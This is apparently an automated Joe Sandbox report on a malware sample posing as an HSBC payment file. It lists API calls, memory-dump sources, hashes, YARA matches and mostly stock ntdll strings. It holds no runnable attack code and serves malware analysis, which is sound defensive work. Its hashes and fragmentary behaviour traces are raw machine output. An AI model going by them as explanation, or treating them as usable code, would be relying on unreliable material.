                                                                    • API String ID: 1646373207-3712701948
                                                                    • Opcode ID: 44d3bd1e1d35cb5e5c9607673ed8ddc0a7069ea664011e1fc127b9cf721f70b8
                                                                    • Instruction ID: f759332acc21d8d83fc42a9e64a97efebfe5a5fd3524a5370d03ce7a68360561
                                                                    • Opcode Fuzzy Hash: 44d3bd1e1d35cb5e5c9607673ed8ddc0a7069ea664011e1fc127b9cf721f70b8
                                                                    • Instruction Fuzzy Hash: DCD0A760EC07425EF7087FB168C963626CAAB1CB25F005837F05156501EF71C4948F70
                                                                    APIs
                                                                    • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 02A8E217
                                                                    • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 02A8E233
                                                                    • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 02A8E2AA
                                                                    • VariantClear.OLEAUT32(?), ref: 02A8E2D3
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705823282.0000000002A81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705768223.0000000002A80000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1705906444.0000000002AAD000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706022220.0000000002AE1000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD5000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD8000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a80000_HSBC_PAY.jbxd
                                                                    Similarity
                                                                    • API ID: ArraySafe$Bound$ClearIndexVariant
                                                                    • String ID:
                                                                    • API String ID: 920484758-0
                                                                    • Opcode ID: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                                                                    • Instruction ID: 93dd4b450eaba8c20d2e3ec80ee5698d4e2a1329e8181a81e914a3c2912ef52d
                                                                    • Opcode Fuzzy Hash: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                                                                    • Instruction Fuzzy Hash: CF414A75A4062D9FCB61EB68CE90BD9B3BDAF49304F0041D5E648E7251DE30AF848F60
                                                                    APIs
                                                                    • VirtualQuery.KERNEL32(?,?,0000001C), ref: 02A8ACD9
                                                                    • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02A8ACFD
                                                                    • GetModuleFileNameA.KERNEL32(02A80000,?,00000105), ref: 02A8AD18
                                                                    • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02A8ADAE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705823282.0000000002A81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705768223.0000000002A80000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1705906444.0000000002AAD000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706022220.0000000002AE1000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD5000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD8000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a80000_HSBC_PAY.jbxd
                                                                    Similarity
                                                                    • API ID: FileModuleName$LoadQueryStringVirtual
                                                                    • String ID:
                                                                    • API String ID: 3990497365-0
                                                                    • Opcode ID: ff93dbfd5a13cde9ce149979fccef014fe86598c34979e5b982f60b531a647c7
                                                                    • Instruction ID: 08fb01bf2b0d9f0192808b8b06308384c22a8d3ac92961f6e7363c45e4ed8134
                                                                    • Opcode Fuzzy Hash: ff93dbfd5a13cde9ce149979fccef014fe86598c34979e5b982f60b531a647c7
                                                                    • Instruction Fuzzy Hash: CC410B71A402589BDB21EB68CD84BDAB7FDAB08700F4444E6A648E7241EF749F848F50
                                                                    APIs
                                                                    • VirtualQuery.KERNEL32(?,?,0000001C), ref: 02A8ACD9
                                                                    • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02A8ACFD
                                                                    • GetModuleFileNameA.KERNEL32(02A80000,?,00000105), ref: 02A8AD18
                                                                    • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02A8ADAE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705823282.0000000002A81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705768223.0000000002A80000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1705906444.0000000002AAD000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706022220.0000000002AE1000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD5000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD8000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a80000_HSBC_PAY.jbxd
                                                                    Similarity
                                                                    • API ID: FileModuleName$LoadQueryStringVirtual
                                                                    • String ID:
                                                                    • API String ID: 3990497365-0
                                                                    • Opcode ID: f682b7970e4953dd56d2133d122c73314652c8fc68c45df4cce0ba53e359a38b
                                                                    • Instruction ID: dfe081301347524baa8e1acf252e5dbb67c07f54264c6b844e85fe1b113190d0
                                                                    • Opcode Fuzzy Hash: f682b7970e4953dd56d2133d122c73314652c8fc68c45df4cce0ba53e359a38b
                                                                    • Instruction Fuzzy Hash: 78411D71A402589BDB21FB68CD84BDAB7FDAB08700F4404E6A648E7241EF749F858F50
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705823282.0000000002A81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705768223.0000000002A80000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1705906444.0000000002AAD000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706022220.0000000002AE1000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD5000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD8000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a80000_HSBC_PAY.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 21516ba38a2ab146ec329f39d9bcffee05ef81e762c7479f4c9a0a674732a2c9
                                                                    • Instruction ID: 1ea0ef4f20f0ba1af6efc4fb8873011454cdfe6cf750ca7338aab423a7c08e9b
                                                                    • Opcode Fuzzy Hash: 21516ba38a2ab146ec329f39d9bcffee05ef81e762c7479f4c9a0a674732a2c9
                                                                    • Instruction Fuzzy Hash: 6BA1B2A67516004BE718BB7D9EC43BDB7C69B84325F18427EE21DCB281EF68C9538690
                                                                    APIs
                                                                    • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,02A8955A), ref: 02A894F2
                                                                    • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,02A8955A), ref: 02A894F8
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705823282.0000000002A81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705768223.0000000002A80000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1705906444.0000000002AAD000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706022220.0000000002AE1000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD5000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD8000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a80000_HSBC_PAY.jbxd
                                                                    Similarity
                                                                    • API ID: DateFormatLocaleThread
                                                                    • String ID: yyyy
                                                                    • API String ID: 3303714858-3145165042
                                                                    APIs
                                                                      • Part of subcall function 02A98018: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02A98088,?,?,00000000,?,02A979FE,ntdll,00000000,00000000,02A97A43,?,?,00000000), ref: 02A98056
                                                                      • Part of subcall function 02A98018: GetModuleHandleA.KERNELBASE(?), ref: 02A9806A
                                                                      • Part of subcall function 02A980C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02A98148,?,?,00000000,00000000,?,02A98061,00000000,KernelBASE,00000000,00000000,02A98088), ref: 02A9810D
                                                                      • Part of subcall function 02A980C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02A98113
                                                                      • Part of subcall function 02A980C0: GetProcAddress.KERNEL32(?,?), ref: 02A98125
                                                                    • FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02A9820E), ref: 02A981F0
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705823282.0000000002A81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705768223.0000000002A80000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1705906444.0000000002AAD000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706022220.0000000002AE1000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD5000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD8000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a80000_HSBC_PAY.jbxd
                                                                    Similarity
                                                                    • API ID: HandleModule$AddressProc$CacheFlushInstruction
                                                                    • String ID: FlushInstructionCache$Kernel32
                                                                    • API String ID: 3811539418-184458249
                                                                    APIs
                                                                    • IsBadReadPtr.KERNEL32(?,00000004), ref: 02A9AD90
                                                                    • IsBadWritePtr.KERNEL32(?,00000004), ref: 02A9ADC0
                                                                    • IsBadReadPtr.KERNEL32(?,00000008), ref: 02A9ADDF
                                                                    • IsBadReadPtr.KERNEL32(?,00000004), ref: 02A9ADEB
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705823282.0000000002A81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705768223.0000000002A80000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1705906444.0000000002AAD000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706022220.0000000002AE1000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD5000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD8000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a80000_HSBC_PAY.jbxd
                                                                    Similarity
                                                                    • API ID: Read$Write
                                                                    • String ID:
                                                                    • API String ID: 3448952669-0

                                                                    Execution Graph

                                                                    Execution Coverage: 0.9%
                                                                    Dynamic/Decrypted Code Coverage: 5.3%
                                                                    Signature Coverage: 0%
                                                                    Total number of Nodes: 133
                                                                    Total number of Limit Nodes: 14
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000001.1703200242.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_1_400000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @$B$a```$gfff$gfff$gfff$gfff
                                                                    • API String ID: 0-3667867154

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417BA5
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2097027277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID: Load
                                                                    • String ID:
                                                                    • API String ID: 2234796835-0

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042CB4A
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2097027277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID: Close
                                                                    • String ID:
                                                                    • API String ID: 3535843008-0

                                                                    Control-flow Graph

                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0

                                                                    Control-flow Graph

                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0

                                                                    Control-flow Graph

                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • EntryPoint.UZONFNTK(?,0000032C,?), ref: 00401BFF
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2097027277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID: EntryPoint
                                                                    • String ID: a```
                                                                    • API String ID: 3225343992-3259403941

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4), ref: 0042CEB2
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2097027277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID: FreeHeap
                                                                    • String ID: whA
                                                                    • API String ID: 3298025750-33568622

                                                                    Control-flow Graph (graph rendering not extracted): basic blocks 417b81-417c91; calls 42e263, LdrLoadDll
                                                                    APIs
                                                                    • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417BA5
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2097027277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_uzonfntK.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Load
                                                                    • String ID:
                                                                    • API String ID: 2234796835-0
                                                                    • Opcode ID: 9c1eec5154773877787138fe86bce77930200dc82f902c6671fe6d8f6ed452b9
                                                                    • Instruction ID: 93b2374f167c02f6a28249779b1fd5adc8fce152e1fc3efdeaf84b546dfcf957
                                                                    • Opcode Fuzzy Hash: 9c1eec5154773877787138fe86bce77930200dc82f902c6671fe6d8f6ed452b9
                                                                    • Instruction Fuzzy Hash: 4421C07294C206ABDB00E9749846ACB7774FB45318F04455AD80C9B702E739B6968BD5

                                                                    Control-flow Graph (graph rendering not extracted): basic blocks 417b27-417bad; calls 42f7c3, 42fdc3, 430063, 42e263, LdrLoadDll
                                                                    APIs
                                                                    • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417BA5
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2097027277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_uzonfntK.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Load
                                                                    • String ID:
                                                                    • API String ID: 2234796835-0
                                                                    • Opcode ID: a6e2919529e9c876640029debfc0c632573f28569a56996c2d7557fe68807e94
                                                                    • Instruction ID: 520125f5abcca6f32ee259adfec299557dcb37a3b4497778880cbe12b8f3150b
                                                                    • Opcode Fuzzy Hash: a6e2919529e9c876640029debfc0c632573f28569a56996c2d7557fe68807e94
                                                                    • Instruction Fuzzy Hash: A4F02BB190C24DABCB20CE64DC409DDBB74AF55234F0487EED998671C2E2305649C756

                                                                    Control-flow Graph (graph rendering not extracted): basic blocks 42ce23-42ce67; calls 404973, 42dd63, RtlAllocateHeap
                                                                    APIs
                                                                    • RtlAllocateHeap.NTDLL(?,0041E934,?,?,00000000,?,0041E934,?,?,?), ref: 0042CE62
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2097027277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_uzonfntK.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AllocateHeap
                                                                    • String ID:
                                                                    • API String ID: 1279760036-0
                                                                    • Opcode ID: 95b7bf504a5d7150f79f6da0c0947be83d3fb5d3e638616617d95ae11c794cbc
                                                                    • Instruction ID: 54a44c9eb01fc689f5ac2f601c65d0757ab140ae4e4e75f286cde17a1d142988
                                                                    • Opcode Fuzzy Hash: 95b7bf504a5d7150f79f6da0c0947be83d3fb5d3e638616617d95ae11c794cbc
                                                                    • Instruction Fuzzy Hash: 86E06DB52042047BD620EE59EC45EEB37ADEFC5710F40441AFA48A7241CA70B9108BB9

                                                                    Control-flow Graph (graph rendering not extracted): basic blocks 42cec3-42ceff; calls 404973, 42dd63, ExitProcess
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2097027277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_uzonfntK.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ExitProcess
                                                                    • String ID:
                                                                    • API String ID: 621844428-0
                                                                    • Opcode ID: 48a4ca06673889c6306624666cc140c898ea0e1073073a3aa0900f5f06714748
                                                                    • Instruction ID: 54eb179f5a4ec7a69d43dd70d9c2d94cb10809d16adc756a8638f1923563bae3
                                                                    • Opcode Fuzzy Hash: 48a4ca06673889c6306624666cc140c898ea0e1073073a3aa0900f5f06714748
                                                                    • Instruction Fuzzy Hash: 64E04F712102147BD120EA6ADC41F9BB76CDBC5714F40802AFA08A7281C670B90187F4

                                                                    Control-flow Graph (graph rendering not extracted): basic blocks 29012c0a-29012c26; calls LdrInitializeThunk
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 12c6ee5e5b1a6619e960f55590a30b656a94986e193380dccaaf00a35df74843
                                                                    • Instruction ID: 8941a6d978e43f92ca1933383a835745fadef2bc25e5dffb3911dd38604027c8
                                                                    • Opcode Fuzzy Hash: 12c6ee5e5b1a6619e960f55590a30b656a94986e193380dccaaf00a35df74843
                                                                    • Instruction Fuzzy Hash: C7B09B71D019C9C6E605E7644609707794467E0701F15C473D3030741F4738C1D2E5B5
                                                                    Strings
                                                                    • *** An Access Violation occurred in %ws:%s, xrefs: 29088F3F
                                                                    • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 29088F26
                                                                    • The resource is owned shared by %d threads, xrefs: 29088E2E
                                                                    • *** Resource timeout (%p) in %ws:%s, xrefs: 29088E02
                                                                    • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 29088E4B
                                                                    • The critical section is owned by thread %p., xrefs: 29088E69
                                                                    • The instruction at %p tried to %s , xrefs: 29088F66
                                                                    • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 29088D8C
                                                                    • *** then kb to get the faulting stack, xrefs: 29088FCC
                                                                    • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 29088E86
                                                                    • a NULL pointer, xrefs: 29088F90
                                                                    • write to, xrefs: 29088F56
                                                                    • *** enter .cxr %p for the context, xrefs: 29088FBD
                                                                    • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 29088E3F
                                                                    • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 29088DB5
                                                                    • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 29088F34
                                                                    • The resource is owned exclusively by thread %p, xrefs: 29088E24
                                                                    • *** A stack buffer overrun occurred in %ws:%s, xrefs: 29088DA3
                                                                    • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 29088DC4
                                                                    • *** enter .exr %p for the exception record, xrefs: 29088FA1
                                                                    • This failed because of error %Ix., xrefs: 29088EF6
                                                                    • Go determine why that thread has not released the critical section., xrefs: 29088E75
                                                                    • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 29088FEF
                                                                    • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 29088F2D
                                                                    • <unknown>, xrefs: 29088D2E, 29088D81, 29088E00, 29088E49, 29088EC7, 29088F3E
                                                                    • *** Inpage error in %ws:%s, xrefs: 29088EC8
                                                                    • read from, xrefs: 29088F5D, 29088F62
                                                                    • an invalid address, %p, xrefs: 29088F7F
                                                                    • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 29088DD3
                                                                    • The instruction at %p referenced memory at %p., xrefs: 29088EE2
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                                    • API String ID: 0-108210295
                                                                    • Opcode ID: 5b867da8b267fd4b7cdb7c462dc9d8dd8d7f5d403826251051fa560d00d0fe18
                                                                    • Instruction ID: d392b15c212702ce5ba3dc64bd222939c2091b2b9dbba0f61044e4800f242dc9
                                                                    • Opcode Fuzzy Hash: 5b867da8b267fd4b7cdb7c462dc9d8dd8d7f5d403826251051fa560d00d0fe18
                                                                    • Instruction Fuzzy Hash: D3810175A0111CBFCB15CB108C84E6F3B76FF66790F054864FA186F216E3758643CA6A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                    • API String ID: 0-2160512332
                                                                    • Opcode ID: be7d44fc81f5b10b5661f4e7376f30da70a008663256a792725a3e4f6e41ceac
                                                                    • Instruction ID: cf31ea23dbaa54623d97c60b4203bb603f79a203ed7d02ec48b5ae9c9771caed
                                                                    • Opcode Fuzzy Hash: be7d44fc81f5b10b5661f4e7376f30da70a008663256a792725a3e4f6e41ceac
                                                                    • Instruction Fuzzy Hash: D3927975608349ABE324CF28C880B5BB7E9BF88754F004D2DFA96D7251D770E946CB92
                                                                    Strings
                                                                    • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 290422E4
                                                                    • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 29042602
                                                                    • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 290425EB
                                                                    • RtlpResolveAssemblyStorageMapEntry, xrefs: 2904261F
                                                                    • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 29042412
                                                                    • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 29042498
                                                                    • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 29042624
                                                                    • @, xrefs: 2904259B
                                                                    • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 290424C0
                                                                    • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 29042409
                                                                    • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 29042506
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                    • API String ID: 0-4009184096
